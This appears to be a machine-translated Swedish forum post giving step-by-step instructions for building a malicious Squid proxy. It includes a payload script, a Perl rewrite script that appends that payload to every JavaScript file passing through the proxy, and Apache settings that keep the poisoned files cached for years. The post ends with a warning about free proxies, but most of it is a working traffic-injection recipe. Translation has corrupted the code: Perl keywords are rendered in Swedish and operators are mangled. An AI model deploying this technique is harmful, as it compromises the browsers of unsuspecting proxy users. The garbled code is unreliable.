Detta inlägg redigerades senast av Mo Xiaowen den 2015-6-7 23:19
Detta kan göras genom att helt enkelt ändra konfigurationen av SQUID
Vad är SQUID?
Squid är en programvara som cachar internetdata, tar emot nedladdningsförfrågningar från användare och automatiskt bearbetar den nedladdade datan. När en användare vill ladda ner en startsida kan han skicka en förfrågan till Squid, be Squid ladda ner den åt sig, sedan ansluter Squid till webbplatsen och begär startsidan, och skickar sedan startsidan till användaren medan en backup sparas, när andra användare ansöker om samma sida skickar Squid omedelbart den sparade backupen till användaren, så att användaren känner att hastigheten är ganska snabb. Squid kan proxy-protokoll som HTTP, FTP, GOPHER, SSL och WAIS, och Squid kan hantera det automatiskt, och du kan ställa in Squid efter dina behov för att filtrera bort oönskade saker.
Squid kan fungera i många operativsystem, såsom AIX, Digital, UNIX, FreeBSD, HP-UX, Irix, Linux, NetBSD, Nextstep, SCO, Solaris, OS/2, etc.
Implementeringen är mycket enkel:
1. Installera Squid på en Linux-server.
2. Modifiera serverns kod, infoga en del av vår kod i all sänd javascrip och skicka ut den.
3. Sätt cachetiden för vår modifierade js-fil så högt som möjligt.
Denna metod gäller även för webbplatser med SSL aktiverat; om webbplatsen laddar en osäker resurs (som jquery för en HTTP-sida) kommer de flesta webbläsare att ge en varning, men få personer är uppmärksamma.
Chema sa att mer än 5 000 personer använde hans proxy några dagar efter att han släppt den, och de flesta använde den för dåliga saker, eftersom de använde proxyn, så de trodde att den var anonym och säker, men de förväntade sig aldrig att proxyservern också skulle göra dåliga saker.
Skapa din skadliga proxyserver
Om du redan har en Squid-proxyserver behöver du också en webbserver som Apache.
Steg 1: Skapa en nyttolast
Jag använder ett enkelt skript som demonstration för att peka alla hyperlänkar till min webbplats.
/etc/squid/payload.js
[mw_shl_code=javascrip ta bort t, sann] för(var i=0; i<document.getelementsbytagname('a').length; i++)
document.getElementsByTagName('a').href = "https://blog.haschek.at"; [/mw_shl_code]
Steg 2: Skriv ett skript för att infektera alla JS-filer
/etc/squid/poison.pl
[mw_shl_code=perl, sant]
#!/usr/bin/perl
$|=1;
$count = 0;
$pid = $$;
Medan (<>)
{
chomp $_;
if($_ =- /(.*.js)/i)
{
$url = $1;
system("/usr/bin/wget","-q","-O","/var/www/tmp/$pid-$count.js","$url");
system("chmod o+r /var/www/tmp/$pid-$count.js");
system("katt /etc/squid/payload.js >> /var/www/tmp/$pid-$count.js");
tryck "http://127.0.0.1:80/tmp/$pid-$count.js";
}
annars
{
tryck "$_";
}
$count++;
}[/mw_shl_code]
Detta skript använder wget för att hämta den ursprungliga javascrip från sidan och ta bort t-filen, sedan lägga till koden i /etc/squid/payload.js och skicka den modifierade filen till klienten, medan du behöver skapa /var/www/tmp-katalogen och låta squid skriva filer där. Denna katalog lagrar de modifierade js-filerna.
Steg 3: Kombinera ovanstående skript med Squid
Lägg till det i /etc/squid/squid.conf
[mw_shl_code=html,true]url_rewrite_program /etc/squid/poison.pl[/mw_shl_code]
Steg 4: Få cachen att aldrig gå sönder
/var/www/tmp/.htaccess
[mw_shl_code=html,sant] Löper ut Aktiv
UtlöperDefault "åtkomst plus 3000 dagar"[/mw_shl_code]
Detta kommer att säga åt Apache att ge honom en lång utgångstid tills användaren rensar sin cache.
Om du kopplar upp denna proxy kommer ett klick på någon hyperlänk att omdirigera dig till min webbplats, och cachen kommer fortfarande att finnas kvar även om du inte använder proxyn senare. Jag använde bara en icke-aggressiv last, och med den metoden kan hackare göra mycket mer. Så, påminn dig själv och vänner om att vara försiktiga med att använda gratis proxyer.
|
Publicerad på 2015-01-19 02:34:56
|
|
|
|
Publicerad på 2015-01-19 08:48:45
|
Hyresvärd|
Publicerad på 2015-01-20 14:36:06
|
